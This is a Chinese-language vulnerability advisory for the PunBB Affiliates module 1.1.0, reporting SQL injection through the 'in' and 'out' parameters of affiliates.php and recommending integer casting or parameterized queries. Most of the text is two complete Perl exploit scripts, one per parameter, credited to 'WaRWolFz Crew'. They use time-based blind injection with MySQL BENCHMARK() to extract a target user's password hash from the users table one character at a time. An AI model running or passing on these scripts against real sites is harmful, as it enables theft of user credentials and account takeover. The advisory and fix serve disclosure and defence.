软件: PunBB Affiliates 模块 1.x
描述:
PunBB 的 Affiliates 模块被报告存在一个漏洞，攻击者可利用该漏洞进行 SQL 注入攻击。
传递给 affiliates.php 的 “in” 和 “out” 参数的输入在被用于 SQL 查询之前没有经过正确过滤，攻击者可借此注入任意 SQL 代码来操纵查询。从下面的测试代码可以看出，该参数以数值形式直接拼入查询（无需闭合引号）；测试代码利用 MySQL 的 BENCHMARK() 函数进行基于时间的盲注，逐字符提取 users 表中指定 id 的 password 字段。
该漏洞存在于 1.1.0 版本中，其它版本也可能受到影响。
解决方案:
编辑源代码，确保输入在进入 SQL 查询之前经过正确过滤：对于 in/out 这类只应为整数的参数，应将其强制转换为整数（如 PHP 的 intval()）或改用参数化查询，而不是仅做黑名单过滤。
测试代码:
Perl 代码（针对 “in” 参数的测试代码）
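#!/usr/bin/perl
# [0-Day] PunBB Affiliations.php IN Mod <= v1.1 Remote Blind SQL Injection Exploit
# Coded By Dante90, WaRWolFz Crew
# Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew
#
# Time-based blind SQL injection through the "in" parameter of affiliates.php.
# Each request makes MySQL run BENCHMARK() only when one character of the
# target user's password hash matches the guess; the response delay is the
# oracle. Uses "cls"/"pause", so it assumes a Windows console.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

# State shared between the main loop and the helper subs below.
my $Hash = '';                                   # hash characters recovered so far
my ($Time, $Time_Start, $Time_End, $Response);
my ($Start, $End);

# ASCII codes of the hex alphabet 0-9 a-f: each hash position is brute-forced
# by trying these 16 candidates in turn.
my @chars = (48 .. 57, 97 .. 102);

my $Host = "http://www.victime_site.org/path/";   # Insert Victime Web Site Link (keep the trailing "/")

# Target user id. It is interpolated straight into the injected query, so
# accept digits only instead of letting an arbitrary string reach the URL.
my $id = shift or usage();
usage() unless $id =~ /\A\d+\z/;

my $Method   = HTTP::Request->new(GET => $Host);
my $HTTP     = LWP::UserAgent->new;
my $Referrer = "http://warwolfz.altervista.org/";

# Baseline response time of the site, displayed next to the oracle timings.
my $DefaultTime = request($Referrer);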
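# Build the relative URL for one oracle query.
#   $dec - 1-based position in the password hash (SUBSTRING offset)
#   $hex - ASCII code of the candidate character at that position
# Returns a path+query string to append to $Host. The trailing "/*" comments
# out whatever follows the parameter in the original query. Reads the
# file-level $id (row in `users` whose `password` is being extracted).
# The query is built on one line: the page's wrapped copy embedded newlines
# in the query string.
sub Blind_SQL_Jnjection {
    my ($dec, $hex) = @_;
    my $condition = "ASCII(SUBSTRING(`password`,${dec},1))=${hex}";
    # BENCHMARK() only executes when the guess is right, producing the
    # measurable delay the main loop looks for.
    my $subquery = "SELECT IF(($condition),benchmark(200000000,CHAR(0)),0) "
                 . "FROM `users` WHERE `id`=${id}";
    return "./affiliates.php?in=-1+OR+1!=($subquery)/*";
}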
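# Recover the 40-character hash one hex digit at a time. For every position
# each candidate in @chars is sent; a response slower than the 6-second
# threshold marks that candidate as correct. (The page's copy used an
# en dash where the minus operator belongs; restored to "-".)
for my $pos (1 .. 40) {                              # N Hash characters
    CANDIDATE: for my $ci (0 .. $#chars) {           # 0 -> F
        # Builtin time() has one-second resolution; 6 s is well above an
        # ordinary page load and well below the BENCHMARK() delay.
        $Time_Start = time();
        $HTTP->get($Host . Blind_SQL_Jnjection($pos, $chars[$ci]));
        $Time_End = time();
        $Time = request($Referrer);
        refresh($Host, $DefaultTime, $ci, $Hash, $Time, $pos);
        if ($Time_End - $Time_Start > 6) {
            $Time = request($Referrer);
            refresh($Host, $DefaultTime, $ci, $Hash, $Time, $pos);
            # NOTE(review): this re-tests the same measurement instead of
            # re-sending the query, so it does not actually filter out a
            # one-off slow response. Kept as in the original.
            if ($Time_End - $Time_Start > 6) {
                syswrite(STDOUT, chr($chars[$ci]));
                $Hash .= chr($chars[$ci]);
                $Time = request($Referrer);
                refresh($Host, $DefaultTime, $ci, $Hash, $Time, $pos);
                last CANDIDATE;
            }
        }
    }
    # No candidate matched at the first position: the target is not
    # injectable (or the threshold is wrong), so stop here rather than scan
    # 39 more positions. The original test "length $Hash < 0" can never be
    # true, which left this branch dead.
    if ($pos == 1 && (!defined $Hash || $Hash eq '')) {
        print " * Exploit Failed *\n";
        print " —————————————————— \n";
        exit;
    }
    if ($pos == 40) {
        print " * Exploit Successed *\n";
        print " ——————————————————\n ";
        system("pause");                             # Windows only
    }
}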
# Print the banner and usage text, then terminate. Called when no target
# user id was given on the command line. "cls" assumes a Windows console.
sub usage {
    system("cls");
    my @banner = (
        " \n [0-Day] PunBB Affiliations.php IN Mod <= v1.1 Remote Blind SQL Injection Exploit\n",
        " —————————————————— \n",
        " * USAGE: *\n",
        " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n",
        " * perl name_exploit.pl [id] *\n",
        " —————————————————— \n",
        " * Powered By Dante90, WaRWolFz Crew *\n",
        " * www.warwolfz.org – dante90_founder[at]warwolfz.org *\n",
        " —————————————————— \n",
    );
    print @banner;
    exit;
}
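# Time a plain GET of $Host sent with the given Referer and return the
# elapsed seconds (Time::HiRes resolution). Used for the baseline and for
# the "SQL Time" readout between oracle queries. Dies if the site does not
# answer with a success status, since the timings would be meaningless.
#   $_[0] - URL to send as the Referer header; also stored in the
#           file-level $Referrer.
# (The page's copy used an en dash for the subtraction; restored to "-".)
sub request {
    my ($referrer) = @_;
    $Referrer = $referrer;
    $Method->referrer($Referrer);

    my $started  = Time::HiRes::time();
    my $response = $HTTP->request($Method);
    $response->is_success()
        or die "$Host : ", $response->message, "\n";
    my $elapsed = Time::HiRes::time() - $started;

    return $elapsed;
}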
# Redraw the status screen: clear the console, reprint the banner, then show
# the current state of the brute force.
#   $_[0] site URL           $_[1] baseline response time in seconds
#   $_[2] index into @chars  $_[3] hash recovered so far
#   $_[4] last timed request $_[5] 1-based hash position being worked on
sub refresh {
    my ($site, $default_time, $char_idx, $hash_so_far, $sql_time, $position) = @_;
    system("cls");
    print " \n [0-Day] PunBB Affiliations.php IN Mod <= v1.1 Remote Blind SQL Injection Exploit\n";
    print " —————————————————— \n";
    print " * USAGE: *\n";
    print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
    print " * perl name_exploit.pl [uid] *\n";
    print " —————————————————— \n";
    print " * Powered By Dante90, WaRWolFz Crew *\n";
    print " * www.warwolfz.org – dante90_founder[at]warwolfz.org *\n";
    print " —————————————————— \n";
    print " * Victime Site: $site\n";
    print " * Default Time: $default_time seconds\n";
    print " * BruteForcing Hash: " . chr($chars[$char_idx]) . "\n";
    print " * BruteForcing N Char Hash: $position\n";
    print " * SQL Time: $sql_time seconds\n";
    print " * Hash: $hash_so_far\n";
}
#WaRWolFz Crew
Perl 代码（针对 “out” 参数的测试代码，与上面仅参数名不同）
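#!/usr/bin/perl
# [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit
# Coded By Dante90, WaRWolFz Crew
# Bug Discovered By: Dante90 & UltraSound, WaRWolFz Crew
#
# Time-based blind SQL injection through the "out" parameter of affiliates.php.
# Each request makes MySQL run BENCHMARK() only when one character of the
# target user's password hash matches the guess; the response delay is the
# oracle. Uses "cls"/"pause", so it assumes a Windows console.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
use IO::Socket;

# State shared between the main loop and the helper subs below.
my $Hash = '';                                   # hash characters recovered so far
my ($Time, $Time_Start, $Time_End, $Response);
my ($Start, $End);

# ASCII codes of the hex alphabet 0-9 a-f: each hash position is brute-forced
# by trying these 16 candidates in turn.
my @chars = (48 .. 57, 97 .. 102);

my $Host = "http://www.victime_site.org/path/";   # Insert Victime Web Site Link (keep the trailing "/")

# Target user id. It is interpolated straight into the injected query, so
# accept digits only instead of letting an arbitrary string reach the URL.
my $id = shift or usage();
usage() unless $id =~ /\A\d+\z/;

my $Method   = HTTP::Request->new(GET => $Host);
my $HTTP     = LWP::UserAgent->new;
my $Referrer = "http://warwolfz.altervista.org/";

# Baseline response time of the site, displayed next to the oracle timings.
my $DefaultTime = request($Referrer);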
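# Build the relative URL for one oracle query.
#   $dec - 1-based position in the password hash (SUBSTRING offset)
#   $hex - ASCII code of the candidate character at that position
# Returns a path+query string to append to $Host. The trailing "/*" comments
# out whatever follows the parameter in the original query. Reads the
# file-level $id (row in `users` whose `password` is being extracted).
# The query is built on one line: the page's wrapped copy embedded newlines
# in the query string.
sub Blind_SQL_Jnjection {
    my ($dec, $hex) = @_;
    my $condition = "ASCII(SUBSTRING(`password`,${dec},1))=${hex}";
    # BENCHMARK() only executes when the guess is right, producing the
    # measurable delay the main loop looks for.
    my $subquery = "SELECT IF(($condition),benchmark(200000000,CHAR(0)),0) "
                 . "FROM `users` WHERE `id`=${id}";
    return "./affiliates.php?out=-1+OR+1!=($subquery)/*";
}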
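# Recover the 40-character hash one hex digit at a time. For every position
# each candidate in @chars is sent; a response slower than the 6-second
# threshold marks that candidate as correct. (The page's copy used an
# en dash where the minus operator belongs; restored to "-".)
for my $pos (1 .. 40) {                              # N Hash characters
    CANDIDATE: for my $ci (0 .. $#chars) {           # 0 -> F
        # Builtin time() has one-second resolution; 6 s is well above an
        # ordinary page load and well below the BENCHMARK() delay.
        $Time_Start = time();
        $HTTP->get($Host . Blind_SQL_Jnjection($pos, $chars[$ci]));
        $Time_End = time();
        $Time = request($Referrer);
        refresh($Host, $DefaultTime, $ci, $Hash, $Time, $pos);
        if ($Time_End - $Time_Start > 6) {
            $Time = request($Referrer);
            refresh($Host, $DefaultTime, $ci, $Hash, $Time, $pos);
            # NOTE(review): this re-tests the same measurement instead of
            # re-sending the query, so it does not actually filter out a
            # one-off slow response. Kept as in the original.
            if ($Time_End - $Time_Start > 6) {
                syswrite(STDOUT, chr($chars[$ci]));
                $Hash .= chr($chars[$ci]);
                $Time = request($Referrer);
                refresh($Host, $DefaultTime, $ci, $Hash, $Time, $pos);
                last CANDIDATE;
            }
        }
    }
    # No candidate matched at the first position: the target is not
    # injectable (or the threshold is wrong), so stop here rather than scan
    # 39 more positions. The original test "length $Hash < 0" can never be
    # true, which left this branch dead.
    if ($pos == 1 && (!defined $Hash || $Hash eq '')) {
        print " * Exploit Failed *\n";
        print " —————————————————— \n";
        exit;
    }
    if ($pos == 40) {
        print " * Exploit Successed *\n";
        print " ——————————————————\n ";
        system("pause");                             # Windows only
    }
}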
# Print the banner and usage text, then terminate. Called when no target
# user id was given on the command line. "cls" assumes a Windows console.
sub usage {
    system("cls");
    my @banner = (
        " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n",
        " —————————————————— \n",
        " * USAGE: *\n",
        " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n",
        " * perl name_exploit.pl [id] *\n",
        " —————————————————— \n",
        " * Powered By Dante90, WaRWolFz Crew *\n",
        " * www.warwolfz.org – dante90_founder[at]warwolfz.org *\n",
        " —————————————————— \n",
    );
    print @banner;
    exit;
}
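# Time a plain GET of $Host sent with the given Referer and return the
# elapsed seconds (Time::HiRes resolution). Used for the baseline and for
# the "SQL Time" readout between oracle queries. Dies if the site does not
# answer with a success status, since the timings would be meaningless.
#   $_[0] - URL to send as the Referer header; also stored in the
#           file-level $Referrer.
# (The page's copy used an en dash for the subtraction; restored to "-".)
sub request {
    my ($referrer) = @_;
    $Referrer = $referrer;
    $Method->referrer($Referrer);

    my $started  = Time::HiRes::time();
    my $response = $HTTP->request($Method);
    $response->is_success()
        or die "$Host : ", $response->message, "\n";
    my $elapsed = Time::HiRes::time() - $started;

    return $elapsed;
}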
# Redraw the status screen: clear the console, reprint the banner, then show
# the current state of the brute force.
#   $_[0] site URL           $_[1] baseline response time in seconds
#   $_[2] index into @chars  $_[3] hash recovered so far
#   $_[4] last timed request $_[5] 1-based hash position being worked on
sub refresh {
    my ($site, $default_time, $char_idx, $hash_so_far, $sql_time, $position) = @_;
    system("cls");
    print " \n [0-Day] PunBB Affiliations.php OUT Mod <= v1.1 Remote Blind SQL Injection Exploit\n";
    print " —————————————————— \n";
    print " * USAGE: *\n";
    print " * cd [Local Disk]:\\[Directory Of Exploit]\\ *\n";
    print " * perl name_exploit.pl [uid] *\n";
    print " —————————————————— \n";
    print " * Powered By Dante90, WaRWolFz Crew *\n";
    print " * www.warwolfz.org – dante90_founder[at]warwolfz.org *\n";
    print " —————————————————— \n";
    print " * Victime Site: $site\n";
    print " * Default Time: $default_time seconds\n";
    print " * BruteForcing Hash: " . chr($chars[$char_idx]) . "\n";
    print " * BruteForcing N Char Hash: $position\n";
    print " * SQL Time: $sql_time seconds\n";
    print " * Hash: $hash_so_far\n";
}
#WaRWolFz Crew